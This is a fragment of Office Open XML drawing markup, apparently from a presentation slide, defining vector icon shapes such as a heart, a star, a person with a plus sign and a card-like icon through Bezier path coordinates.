                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{576BC8CD-8C43-403D-BC69-CC4F388C8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825882" y="1647445"/>
              <a:ext cx="735013" cy="684213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 196"/>
                <a:gd name="T1" fmla="*/ 181 h 182"/>
                <a:gd name="T2" fmla="*/ 98 w 196"/>
                <a:gd name="T3" fmla="*/ 182 h 182"/>
                <a:gd name="T4" fmla="*/ 98 w 196"/>
                <a:gd name="T5" fmla="*/ 181 h 182"/>
                <a:gd name="T6" fmla="*/ 98 w 196"/>
                <a:gd name="T7" fmla="*/ 182 h 182"/>
                <a:gd name="T8" fmla="*/ 98 w 196"/>
                <a:gd name="T9" fmla="*/ 181 h 182"/>
                <a:gd name="T10" fmla="*/ 2 w 196"/>
                <a:gd name="T11" fmla="*/ 54 h 182"/>
                <a:gd name="T12" fmla="*/ 2 w 196"/>
                <a:gd name="T13" fmla="*/ 45 h 182"/>
                <a:gd name="T14" fmla="*/ 50 w 196"/>
                <a:gd name="T15" fmla="*/ 0 h 182"/>
                <a:gd name="T16" fmla="*/ 98 w 196"/>
                <a:gd name="T17" fmla="*/ 39 h 182"/>
                <a:gd name="T18" fmla="*/ 145 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 182"/>
                <a:gd name="T20" fmla="*/ 193 w 196"/>
                <a:gd name="T21" fmla="*/ 45 h 182"/>
                <a:gd name="T22" fmla="*/ 193 w 196"/>
                <a:gd name="T23" fmla="*/ 54 h 182"/>
                <a:gd name="T24" fmla="*/ 98 w 196"/>
                <a:gd name="T25" fmla="*/ 181 h 182"/>
                <a:gd name="T26" fmla="*/ 169 w 196"/>
                <a:gd name="T27" fmla="*/ 58 h 182"/>
                <a:gd name="T28" fmla="*/ 142 w 196"/>
                <a:gd name="T29" fmla="*/ 22 h 182"/>
                <a:gd name="T30" fmla="*/ 98 w 196"/>
                <a:gd name="T31" fmla="*/ 68 h 182"/>
                <a:gd name="T32" fmla="*/ 54 w 196"/>
                <a:gd name="T33" fmla="*/ 22 h 182"/>
                <a:gd name="T34" fmla="*/ 25 w 196"/>
                <a:gd name="T35" fmla="*/ 58 h 182"/>
                <a:gd name="T36" fmla="*/ 25 w 196"/>
                <a:gd name="T37" fmla="*/ 64 h 182"/>
                <a:gd name="T38" fmla="*/ 97 w 196"/>
                <a:gd name="T39" fmla="*/ 151 h 182"/>
                <a:gd name="T40" fmla="*/ 97 w 196"/>
                <a:gd name="T41" fmla="*/ 151 h 182"/>
                <a:gd name="T42" fmla="*/ 98 w 196"/>
                <a:gd name="T43" fmla="*/ 151 h 182"/>
                <a:gd name="T44" fmla="*/ 98 w 196"/>
                <a:gd name="T45" fmla="*/ 151 h 182"/>
                <a:gd name="T46" fmla="*/ 98 w 196"/>
                <a:gd name="T47" fmla="*/ 151 h 182"/>
                <a:gd name="T48" fmla="*/ 169 w 196"/>
                <a:gd name="T49" fmla="*/ 64 h 182"/>
                <a:gd name="T50" fmla="*/ 169 w 196"/>
                <a:gd name="T51" fmla="*/ 5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82">
                  <a:moveTo>
                    <a:pt x="98" y="181"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="181"/>
                    <a:pt x="98" y="182"/>
                    <a:pt x="98" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="182"/>
                    <a:pt x="98" y="182"/>
                    <a:pt x="98" y="181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98" y="182"/>
                    <a:pt x="98" y="181"/>
                    <a:pt x="98" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="117"/>
                    <a:pt x="2" y="54"/>
                    <a:pt x="2" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="54"/>
                    <a:pt x="2" y="52"/>
                    <a:pt x="2" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="20"/>
                    <a:pt x="24" y="0"/>
                    <a:pt x="50" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="0"/>
                    <a:pt x="98" y="39"/>
                    <a:pt x="98" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="39"/>
                    <a:pt x="102" y="0"/>
                    <a:pt x="145" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="0"/>
                    <a:pt x="193" y="20"/>
                    <a:pt x="193" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="52"/>
                    <a:pt x="193" y="54"/>
                    <a:pt x="193" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="54"/>
                    <a:pt x="196" y="117"/>
                    <a:pt x="98" y="181"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="169" y="58"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="40"/>
                    <a:pt x="161" y="22"/>
                    <a:pt x="142" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="22"/>
                    <a:pt x="98" y="68"/>
                    <a:pt x="98" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="68"/>
                    <a:pt x="85" y="22"/>
                    <a:pt x="54" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="22"/>
                    <a:pt x="25" y="40"/>
                    <a:pt x="25" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="62"/>
                    <a:pt x="25" y="64"/>
                    <a:pt x="25" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="64"/>
                    <a:pt x="28" y="105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168" y="105"/>
                    <a:pt x="169" y="64"/>
                    <a:pt x="169" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="64"/>
                    <a:pt x="169" y="62"/>
                    <a:pt x="169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77">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00A2CFE1-C1D4-4832-A394-92F630F2F3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861685">
              <a:off x="8012972" y="5636542"/>
              <a:ext cx="750888" cy="738188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 160 w 200"/>
                <a:gd name="T1" fmla="*/ 194 h 196"/>
                <a:gd name="T2" fmla="*/ 120 w 200"/>
                <a:gd name="T3" fmla="*/ 154 h 196"/>
                <a:gd name="T4" fmla="*/ 160 w 200"/>
                <a:gd name="T5" fmla="*/ 114 h 196"/>
                <a:gd name="T6" fmla="*/ 200 w 200"/>
                <a:gd name="T7" fmla="*/ 154 h 196"/>
                <a:gd name="T8" fmla="*/ 160 w 200"/>
                <a:gd name="T9" fmla="*/ 194 h 196"/>
                <a:gd name="T10" fmla="*/ 184 w 200"/>
                <a:gd name="T11" fmla="*/ 148 h 196"/>
                <a:gd name="T12" fmla="*/ 168 w 200"/>
                <a:gd name="T13" fmla="*/ 148 h 196"/>
                <a:gd name="T14" fmla="*/ 168 w 200"/>
                <a:gd name="T15" fmla="*/ 132 h 196"/>
                <a:gd name="T16" fmla="*/ 152 w 200"/>
                <a:gd name="T17" fmla="*/ 132 h 196"/>
                <a:gd name="T18" fmla="*/ 152 w 200"/>
                <a:gd name="T19" fmla="*/ 148 h 196"/>
                <a:gd name="T20" fmla="*/ 136 w 200"/>
                <a:gd name="T21" fmla="*/ 148 h 196"/>
                <a:gd name="T22" fmla="*/ 136 w 200"/>
                <a:gd name="T23" fmla="*/ 164 h 196"/>
                <a:gd name="T24" fmla="*/ 152 w 200"/>
                <a:gd name="T25" fmla="*/ 164 h 196"/>
                <a:gd name="T26" fmla="*/ 152 w 200"/>
                <a:gd name="T27" fmla="*/ 180 h 196"/>
                <a:gd name="T28" fmla="*/ 168 w 200"/>
                <a:gd name="T29" fmla="*/ 180 h 196"/>
                <a:gd name="T30" fmla="*/ 168 w 200"/>
                <a:gd name="T31" fmla="*/ 164 h 196"/>
                <a:gd name="T32" fmla="*/ 184 w 200"/>
                <a:gd name="T33" fmla="*/ 164 h 196"/>
                <a:gd name="T34" fmla="*/ 184 w 200"/>
                <a:gd name="T35" fmla="*/ 148 h 196"/>
                <a:gd name="T36" fmla="*/ 80 w 200"/>
                <a:gd name="T37" fmla="*/ 128 h 196"/>
                <a:gd name="T38" fmla="*/ 16 w 200"/>
                <a:gd name="T39" fmla="*/ 64 h 196"/>
                <a:gd name="T40" fmla="*/ 80 w 200"/>
                <a:gd name="T41" fmla="*/ 0 h 196"/>
                <a:gd name="T42" fmla="*/ 144 w 200"/>
                <a:gd name="T43" fmla="*/ 64 h 196"/>
                <a:gd name="T44" fmla="*/ 80 w 200"/>
                <a:gd name="T45" fmla="*/ 128 h 196"/>
                <a:gd name="T46" fmla="*/ 70 w 200"/>
                <a:gd name="T47" fmla="*/ 17 h 196"/>
                <a:gd name="T48" fmla="*/ 31 w 200"/>
                <a:gd name="T49" fmla="*/ 64 h 196"/>
                <a:gd name="T50" fmla="*/ 80 w 200"/>
                <a:gd name="T51" fmla="*/ 113 h 196"/>
                <a:gd name="T52" fmla="*/ 129 w 200"/>
                <a:gd name="T53" fmla="*/ 64 h 196"/>
                <a:gd name="T54" fmla="*/ 70 w 200"/>
                <a:gd name="T55" fmla="*/ 17 h 196"/>
                <a:gd name="T56" fmla="*/ 40 w 200"/>
                <a:gd name="T57" fmla="*/ 132 h 196"/>
                <a:gd name="T58" fmla="*/ 113 w 200"/>
                <a:gd name="T59" fmla="*/ 132 h 196"/>
                <a:gd name="T60" fmla="*/ 108 w 200"/>
                <a:gd name="T61" fmla="*/ 154 h 196"/>
                <a:gd name="T62" fmla="*/ 129 w 200"/>
                <a:gd name="T63" fmla="*/ 196 h 196"/>
                <a:gd name="T64" fmla="*/ 0 w 200"/>
                <a:gd name="T65" fmla="*/ 196 h 196"/>
                <a:gd name="T66" fmla="*/ 20 w 200"/>
                <a:gd name="T67" fmla="*/ 148 h 196"/>
                <a:gd name="T68" fmla="*/ 40 w 200"/>
                <a:gd name="T69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96">
                  <a:moveTo>
                    <a:pt x="160" y="194"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="194"/>
                    <a:pt x="120" y="176"/>
                    <a:pt x="120" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="132"/>
                    <a:pt x="138" y="114"/>
                    <a:pt x="160" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="114"/>
                    <a:pt x="200" y="132"/>
                    <a:pt x="200" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="176"/>
                    <a:pt x="182" y="194"/>
                    <a:pt x="160" y="194"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="184" y="148"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="148"/>
                    <a:pt x="168" y="148"/>
                    <a:pt x="168" y="148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52" y="164"/>
                    <a:pt x="152" y="164"/>
                    <a:pt x="152" y="164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84" y="164"/>
                    <a:pt x="184" y="164"/>
                    <a:pt x="184" y="164"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="148"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="80" y="128"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="128"/>
                    <a:pt x="16" y="99"/>
                    <a:pt x="16" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="29"/>
                    <a:pt x="45" y="0"/>
                    <a:pt x="80" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="0"/>
                    <a:pt x="144" y="29"/>
                    <a:pt x="144" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="99"/>
                    <a:pt x="116" y="128"/>
                    <a:pt x="80" y="128"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="70" y="17"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="24"/>
                    <a:pt x="74" y="49"/>
                    <a:pt x="31" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="91"/>
                    <a:pt x="53" y="113"/>
                    <a:pt x="80" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="113"/>
                    <a:pt x="129" y="91"/>
                    <a:pt x="129" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="43"/>
                    <a:pt x="62" y="53"/>
                    <a:pt x="70" y="17"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="40" y="132"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="132"/>
                    <a:pt x="113" y="132"/>
                    <a:pt x="113" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="139"/>
                    <a:pt x="108" y="146"/>
                    <a:pt x="108" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="171"/>
                    <a:pt x="117" y="187"/>
                    <a:pt x="12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0" y="148"/>
                    <a:pt x="25" y="132"/>
                    <a:pt x="40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80">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60AE3412-5AA0-4BEA-9D80-59787BDE4E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001" y="12722"/>
              <a:ext cx="514222" cy="482508"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/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83">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD831DA2-3608-4D27-96AE-EE7FE69B99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953803" y="4764419"/>
              <a:ext cx="579438" cy="741363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3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3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0" y="153"/>
                    <a:pt x="78" y="197"/>
                    <a:pt x="78" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="197"/>
                    <a:pt x="15" y="160"/>
                    <a:pt x="3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80"/>
                    <a:pt x="153" y="83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3" y="47"/>
                    <a:pt x="33" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="95"/>
                    <a:pt x="53" y="114"/>
                    <a:pt x="77" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="114"/>
                    <a:pt x="120" y="95"/>
                    <a:pt x="120" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="47"/>
                    <a:pt x="100" y="28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84">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C696D06B-B589-492F-9923-6A6CD50C08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9109649">
              <a:off x="7311862" y="3305164"/>
              <a:ext cx="579438" cy="741363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85">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053409F7-22CF-44F3-AF4B-956CC3C98E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99709" y="2965550"/>
              <a:ext cx="723900" cy="688975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 227 w 456"/>
                <a:gd name="T1" fmla="*/ 0 h 434"/>
                <a:gd name="T2" fmla="*/ 302 w 456"/>
                <a:gd name="T3" fmla="*/ 135 h 434"/>
                <a:gd name="T4" fmla="*/ 456 w 456"/>
                <a:gd name="T5" fmla="*/ 166 h 434"/>
                <a:gd name="T6" fmla="*/ 350 w 456"/>
                <a:gd name="T7" fmla="*/ 280 h 434"/>
                <a:gd name="T8" fmla="*/ 369 w 456"/>
                <a:gd name="T9" fmla="*/ 434 h 434"/>
                <a:gd name="T10" fmla="*/ 227 w 456"/>
                <a:gd name="T11" fmla="*/ 367 h 434"/>
                <a:gd name="T12" fmla="*/ 87 w 456"/>
                <a:gd name="T13" fmla="*/ 434 h 434"/>
                <a:gd name="T14" fmla="*/ 106 w 456"/>
                <a:gd name="T15" fmla="*/ 280 h 434"/>
                <a:gd name="T16" fmla="*/ 0 w 456"/>
                <a:gd name="T17" fmla="*/ 166 h 434"/>
                <a:gd name="T18" fmla="*/ 153 w 456"/>
                <a:gd name="T19" fmla="*/ 135 h 434"/>
                <a:gd name="T20" fmla="*/ 227 w 456"/>
                <a:gd name="T21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6" h="434">
                  <a:moveTo>
                    <a:pt x="227" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="302" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456" y="166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369" y="434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87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3" y="13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88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC1A880D-F80A-4621-A1FF-2D8437B1C3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080229">
              <a:off x="10645043" y="34042"/>
              <a:ext cx="720725" cy="688975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89">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0B20EF9-B7FB-460B-A4F1-B7F1E791EE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334403">
              <a:off x="3179228" y="3951711"/>
              <a:ext cx="725488" cy="555625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 167 w 193"/>
                <a:gd name="T1" fmla="*/ 14 h 148"/>
                <a:gd name="T2" fmla="*/ 159 w 193"/>
                <a:gd name="T3" fmla="*/ 0 h 148"/>
                <a:gd name="T4" fmla="*/ 139 w 193"/>
                <a:gd name="T5" fmla="*/ 6 h 148"/>
                <a:gd name="T6" fmla="*/ 125 w 193"/>
                <a:gd name="T7" fmla="*/ 20 h 148"/>
                <a:gd name="T8" fmla="*/ 55 w 193"/>
                <a:gd name="T9" fmla="*/ 14 h 148"/>
                <a:gd name="T10" fmla="*/ 47 w 193"/>
                <a:gd name="T11" fmla="*/ 0 h 148"/>
                <a:gd name="T12" fmla="*/ 26 w 193"/>
                <a:gd name="T13" fmla="*/ 6 h 148"/>
                <a:gd name="T14" fmla="*/ 15 w 193"/>
                <a:gd name="T15" fmla="*/ 20 h 148"/>
                <a:gd name="T16" fmla="*/ 0 w 193"/>
                <a:gd name="T17" fmla="*/ 134 h 148"/>
                <a:gd name="T18" fmla="*/ 178 w 193"/>
                <a:gd name="T19" fmla="*/ 148 h 148"/>
                <a:gd name="T20" fmla="*/ 193 w 193"/>
                <a:gd name="T21" fmla="*/ 34 h 148"/>
                <a:gd name="T22" fmla="*/ 146 w 193"/>
                <a:gd name="T23" fmla="*/ 14 h 148"/>
                <a:gd name="T24" fmla="*/ 153 w 193"/>
                <a:gd name="T25" fmla="*/ 7 h 148"/>
                <a:gd name="T26" fmla="*/ 160 w 193"/>
                <a:gd name="T27" fmla="*/ 28 h 148"/>
                <a:gd name="T28" fmla="*/ 153 w 193"/>
                <a:gd name="T29" fmla="*/ 35 h 148"/>
                <a:gd name="T30" fmla="*/ 146 w 193"/>
                <a:gd name="T31" fmla="*/ 14 h 148"/>
                <a:gd name="T32" fmla="*/ 107 w 193"/>
                <a:gd name="T33" fmla="*/ 92 h 148"/>
                <a:gd name="T34" fmla="*/ 107 w 193"/>
                <a:gd name="T35" fmla="*/ 84 h 148"/>
                <a:gd name="T36" fmla="*/ 146 w 193"/>
                <a:gd name="T37" fmla="*/ 88 h 148"/>
                <a:gd name="T38" fmla="*/ 146 w 193"/>
                <a:gd name="T39" fmla="*/ 104 h 148"/>
                <a:gd name="T40" fmla="*/ 108 w 193"/>
                <a:gd name="T41" fmla="*/ 108 h 148"/>
                <a:gd name="T42" fmla="*/ 108 w 193"/>
                <a:gd name="T43" fmla="*/ 100 h 148"/>
                <a:gd name="T44" fmla="*/ 146 w 193"/>
                <a:gd name="T45" fmla="*/ 104 h 148"/>
                <a:gd name="T46" fmla="*/ 68 w 193"/>
                <a:gd name="T47" fmla="*/ 80 h 148"/>
                <a:gd name="T48" fmla="*/ 40 w 193"/>
                <a:gd name="T49" fmla="*/ 80 h 148"/>
                <a:gd name="T50" fmla="*/ 34 w 193"/>
                <a:gd name="T51" fmla="*/ 14 h 148"/>
                <a:gd name="T52" fmla="*/ 41 w 193"/>
                <a:gd name="T53" fmla="*/ 7 h 148"/>
                <a:gd name="T54" fmla="*/ 47 w 193"/>
                <a:gd name="T55" fmla="*/ 28 h 148"/>
                <a:gd name="T56" fmla="*/ 40 w 193"/>
                <a:gd name="T57" fmla="*/ 35 h 148"/>
                <a:gd name="T58" fmla="*/ 34 w 193"/>
                <a:gd name="T59" fmla="*/ 14 h 148"/>
                <a:gd name="T60" fmla="*/ 31 w 193"/>
                <a:gd name="T61" fmla="*/ 123 h 148"/>
                <a:gd name="T62" fmla="*/ 28 w 193"/>
                <a:gd name="T63" fmla="*/ 113 h 148"/>
                <a:gd name="T64" fmla="*/ 44 w 193"/>
                <a:gd name="T65" fmla="*/ 103 h 148"/>
                <a:gd name="T66" fmla="*/ 56 w 193"/>
                <a:gd name="T67" fmla="*/ 107 h 148"/>
                <a:gd name="T68" fmla="*/ 74 w 193"/>
                <a:gd name="T69" fmla="*/ 103 h 148"/>
                <a:gd name="T70" fmla="*/ 83 w 193"/>
                <a:gd name="T71" fmla="*/ 117 h 148"/>
                <a:gd name="T72" fmla="*/ 143 w 193"/>
                <a:gd name="T73" fmla="*/ 124 h 148"/>
                <a:gd name="T74" fmla="*/ 103 w 193"/>
                <a:gd name="T75" fmla="*/ 119 h 148"/>
                <a:gd name="T76" fmla="*/ 143 w 193"/>
                <a:gd name="T77" fmla="*/ 116 h 148"/>
                <a:gd name="T78" fmla="*/ 143 w 193"/>
                <a:gd name="T79" fmla="*/ 124 h 148"/>
                <a:gd name="T80" fmla="*/ 111 w 193"/>
                <a:gd name="T81" fmla="*/ 76 h 148"/>
                <a:gd name="T82" fmla="*/ 111 w 193"/>
                <a:gd name="T83" fmla="*/ 63 h 148"/>
                <a:gd name="T84" fmla="*/ 167 w 193"/>
                <a:gd name="T85" fmla="*/ 6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3" h="148">
                  <a:moveTo>
                    <a:pt x="178" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="20"/>
                    <a:pt x="167" y="20"/>
                    <a:pt x="167" y="14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7" y="7"/>
                    <a:pt x="166" y="0"/>
                    <a:pt x="159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39" y="0"/>
                    <a:pt x="139" y="6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39" y="21"/>
                    <a:pt x="125" y="20"/>
                    <a:pt x="125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55" y="20"/>
                    <a:pt x="55" y="1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0"/>
                    <a:pt x="4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26" y="0"/>
                    <a:pt x="26" y="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9" y="20"/>
                    <a:pt x="15" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="20"/>
                    <a:pt x="0" y="19"/>
                    <a:pt x="0" y="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1" y="148"/>
                    <a:pt x="14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8"/>
                    <a:pt x="193" y="147"/>
                    <a:pt x="193" y="1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2" y="20"/>
                    <a:pt x="178" y="20"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="146" y="14"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="10"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="152" y="7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7" y="7"/>
                    <a:pt x="160" y="10"/>
                    <a:pt x="160" y="14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32"/>
                    <a:pt x="157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49" y="35"/>
                    <a:pt x="146" y="32"/>
                    <a:pt x="146" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="146" y="14"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="142" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="92"/>
                    <a:pt x="107" y="92"/>
                    <a:pt x="107" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="92"/>
                    <a:pt x="104" y="90"/>
                    <a:pt x="104" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="86"/>
                    <a:pt x="105" y="84"/>
                    <a:pt x="107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4" y="84"/>
                    <a:pt x="146" y="86"/>
                    <a:pt x="146" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="90"/>
                    <a:pt x="144" y="92"/>
                    <a:pt x="142" y="92"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="146" y="104"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="106"/>
                    <a:pt x="144" y="108"/>
                    <a:pt x="142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6" y="108"/>
                    <a:pt x="104" y="106"/>
                    <a:pt x="104" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="102"/>
                    <a:pt x="106" y="100"/>
                    <a:pt x="108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4" y="100"/>
                    <a:pt x="146" y="102"/>
                    <a:pt x="146" y="104"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="54" y="63"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="63"/>
                    <a:pt x="68" y="71"/>
                    <a:pt x="68" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="89"/>
                    <a:pt x="62" y="97"/>
                    <a:pt x="54" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="97"/>
                    <a:pt x="40" y="89"/>
                    <a:pt x="40" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="71"/>
                    <a:pt x="46" y="63"/>
                    <a:pt x="54" y="63"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="34" y="14"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="10"/>
                    <a:pt x="36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7"/>
                    <a:pt x="47" y="10"/>
                    <a:pt x="47" y="14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32"/>
                    <a:pt x="44" y="35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6" y="35"/>
                    <a:pt x="34" y="32"/>
                    <a:pt x="34" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="34" y="14"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="79" y="123"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="123"/>
                    <a:pt x="31" y="123"/>
                    <a:pt x="31" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="123"/>
                    <a:pt x="26" y="122"/>
                    <a:pt x="26" y="117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8" y="113"/>
                    <a:pt x="31" y="107"/>
                    <a:pt x="35" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="98"/>
                    <a:pt x="44" y="103"/>
                    <a:pt x="44" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="103"/>
                    <a:pt x="46" y="107"/>
                    <a:pt x="54" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="107"/>
                    <a:pt x="56" y="107"/>
                    <a:pt x="56" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="107"/>
                    <a:pt x="65" y="103"/>
                    <a:pt x="65" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="103"/>
                    <a:pt x="70" y="98"/>
                    <a:pt x="74" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="107"/>
                    <a:pt x="81" y="113"/>
                    <a:pt x="81" y="113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3" y="122"/>
                    <a:pt x="79" y="123"/>
                    <a:pt x="79" y="123"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="143" y="124"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="124"/>
                    <a:pt x="107" y="124"/>
                    <a:pt x="107" y="124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="124"/>
                    <a:pt x="103" y="121"/>
                    <a:pt x="103" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="118"/>
                    <a:pt x="105" y="116"/>
                    <a:pt x="107" y="116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45" y="116"/>
                    <a:pt x="146" y="118"/>
                    <a:pt x="146" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="121"/>
                    <a:pt x="145" y="124"/>
                    <a:pt x="143" y="124"/>
